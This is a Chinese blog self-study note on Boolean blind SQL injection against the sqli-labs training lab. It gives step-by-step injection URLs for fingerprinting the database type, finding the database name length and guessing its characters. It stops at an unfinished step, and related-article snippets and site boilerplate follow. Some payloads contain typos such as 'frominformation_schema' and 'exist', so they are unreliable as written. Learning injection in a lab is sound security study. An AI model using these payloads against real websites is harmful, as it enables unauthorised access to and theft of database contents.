SQL注入自学笔记

最新推荐文章于 2022-06-29 19:05:42 发布
最新推荐文章于 2022-06-29 19:05:42 发布
阅读量124 收藏
点赞数
文章标签: 渗透测试 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42166369/article/details/119869958
版权


Boolean盲注

盲注通常用于web页面没有回显的情况下,通过盲注来验证注入的sql语句是否得到了执行。盲注这种方式在于猜解。

1.首先判断数据库类型

当在1前加上“-”时,页面并没有报错,https://127.0.0.1/sqli/Less-1/?id=-1

https://127.0.0.1/sqli/Less-1/?id=1’,加上单引号后报错,由此可以说明,这是一个字符型注入点。原sql语句为 select  *  from user  where id = '1''  limit 0,1;

2.在https://127.0.0.1/sqli/Less-1/?id=1’这个注入点上,接下来需要通过盲注判断数据库类型、数据库名、数据库列名和数据库列名下的数据。

判断数据库类型:不同数据库中存在有特有表,mysql(5.0以上本):information_schema.tables、access:msysobjects、sqlserver:sysobjects、oracle:dual。

通过exist()函数判断数据库是否有这些表的数据来判断数据库类型。

https://127.0.0.1/sqli/Less-1/?id=1’ and exist(select * frominformation_schema.tables)#

https://127.0.0.1/sqli/Less-1/?id=1’ and exist(select * from msysobjects)#

https://127.0.0.1/sqli/Less-1/?id=1' and exist(select * from sysobjects)#

https://127.0.0.1/sqli/Less-1/?id=1' and exist(select * from dual)>0#

2.判断数据库名

https://127.0.0.1/sqli/Less-1/?id=1' and length(database())>5 //正常

https://127.0.0.1/sqli/Less-1/?id=1' and length(database())>10 //不正常

https://127.0.0.1/sqli/Less-1/?id=1' and length(database())>7 //正常

https://127.0.0.1/sqli/Less-1/?id=1' and length(database())>8 //不正常

大于7正常且大于8不正常,说明length(database())大于7小于等于8,所以长度为8位

然后通过函数ascii()判断数据库字符

e.g  

https://127.0.0.1/sqli/Less-1/?id=1' and ascii(substr(database(),1,1)) >100     //通过二分法及ascii表分别查询出database()

3.判断数据库中的表

https://127.0.0.1/sqli/Less-1/?id=1’ and exist(select * frominformation_schema.tables)#

crypt00000
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql - > in and exists
weixin_46817405的博客
05-28 522
一、in: 作为筛选条件之一,它后面可以接:子集、字符串; 子集用法示例:select * from table where id in(select id from table); 字符串用法示例:select * from table where id in('aaa','bbb'); 1、子集筛选时,子集只执行一次。 2、内表比较小的时候,in的速度较快。 备注:确定给定的值是否与子查询或列表中的值相匹配。in在查询的时候,首先查询子查询的表,然 后将内表和...
mysqlexists的用法详解
技术人集结地
05-08 5万+
前言 在日常开发中,用mysql进行查询的时候,有一个比较少见的关键词exists,我们今天来学习了解一下这个 exists这个sql关键词的用法,这样在工作中遇到一些特定的业务场景就可以有更加多样化的解决方案 语法解释 语法 SELECT column1 FROM t1 WHERE [conditions] and EXISTS (SELECT * FROM t2 ); 说明 括号中的子查询并不会返回具体的查询到的数据,只是会返回true或者false,如果外层sql的字段在子查询中存在则返回true,
oracle查询效率(二)--in and exist
scarlett
07-29 1829
 in 与 exist 的语法比较:           select × from 数据表 t where t.x in (...)       括号内可以是符合t.x字段类型的值集合,如(1,2,3),但如果t.x是number类型的时候,似乎这样的写法会出问题;也可以是通过另外的select语句查询出来的值集合,如(select y from 数据表2 where ...)。  
2021-4-4 sql注入
passive_person的博客
04-05 423
exists函数 exist() 检查是否存在 (对语句结果检查) select exists(select 1) 返回布尔值 0或1 0是假,1是真 1.判断注入点 2.order by 注入点查询的语句有多少个列名(几个字段) 3.and exists() 怎么知道表名 and exists(select * from table_name) and exists(select column_name from table_name) 4.union select… 搜索型注入、读、写文件 字符型查找
Oracle in and exist
congshi5914的博客
12-12 48
复习一下in&exist语法:一般来讲in是对外表和内表作Hash Join,而exist是对外表和内表做了一个nested loop,也就是说,对于exist,针对外表(需要遍历其所有内容)需要遍历的每一行,都会对内表...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
SQL注入基础知识点 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过构造特定的SQL语句来获取敏感信息或控制数据库。下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造...
SQL注入手工笔记.txt
11-29
SQL手工注入小结笔记,大家都来学习学习
SQL注入笔记
02-07
SQL注入笔记 对于新手学习SQL注入很有帮助 欢迎大家查看
PHPSQL注入漏洞学习
01-21
SQL注入是攻击者通过输入恶意的SQL代码,欺骗数据库服务器执行非预期的操作,从而获取、修改、删除或添加数据的一种方法。在PHP环境中,由于不安全的用户输入处理,这种漏洞尤为突出。 二、PHP SQL注入的类型 1. ...
MySQL复习
weixin_45931856的博客
06-29 263
主要针对InnoDB
access数据库偏移注入
haha1314的博客
05-01 244
一、access注入 access只有一个数据库 A联合注入 1、order by 20 确定字段数 猜表名 2、union select 1,2,3,4,5,6 from admin 爆数字 3、union select password,2,3,4,5,6 from admin 猜列名 B逐字注入 1、 and exist(select * from admin) 猜表 ...
SQL新手上路:NOT EXIST()(一)
msqynl311833的博客
08-22 2万+
SQL新手上路: NOT EXIST()& SELECT 1 from table exists : 强调的是是否返回结果集,不要求知道返回什么, 比如: select name from student where sex = ‘m’ and mark exists(select 1 from grade where …) ,只要exists引导的子句有结果集返回,那么exists这个条...
SQL语句中exists和not exists的用法(常用于过滤)
qq_24099547的博客
07-21 2万+
1.介绍 exists和in都有过滤功能,他俩最大的差别就是in引导的子句只能对一个字段进行限制,比如 /对id字段进行限定 select * from A where sid in (1,2,3) 但是如果我们想对多个字段进行限制,使用in就不合适了,例如 select * from A where (sid,tid) in (select sid,tid from B) 不过很可惜,上面的...
Sql 语句中 IN 和 EXISTS 的区别及应用
热门推荐
jcpp9527的博客
04-03 14万+
演示demo表:student表DROP TABLE IF EXISTS `student`; CREATE TABLE `student` ( `stuid` varchar(16) NOT NULL COMMENT '学号', `stunm` varchar(20) NOT NULL COMMENT '学生姓名', PRIMARY KEY (`stuid`) ) ENGINE=In...
hql 中 exists 用法, and 异常 解决
lili518的博客
09-08 8603
org.hibernate.QueryException: could not resolve property:  一、排查HQL语句中的类字段,看是否是java类中的字段,不要是数据库中的字段; 二、排查各个字段是否与类中字段一致,绝大多数可能是由于字段不匹配导致的问题; hibernate : No positional parameters in qu
oracle exists and not exist
yiyu986
08-20 3369
先看下面的例子:oracle中两个系统表.emp,dept.example:1:not exists(not in) not exists:   这条语句返回select * from scott.dept d where e.deptno=d.deptno and d.deptno=10条件满足的结果集.也就是说,返回的结果集中不存在d.deptno=10结果
SQL IN and Exists 效率高低比较
曹秉毅的blog
06-19 1520
in 和exists in 是把外表和内表作hash 连接,而exists 是对外表作loop 循环,每次loop 循环再对内 表进行查询。 一直以来认为exists 比in 效率高的说法是不准确的。 如果查询的两个表大小相当,那么用in 和exists 差别不大。 如果两个表中一个较小,一个是大表,则子查询表大的用exists,子查询表小的用in: 例如:表A(小表),表B(大表)
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值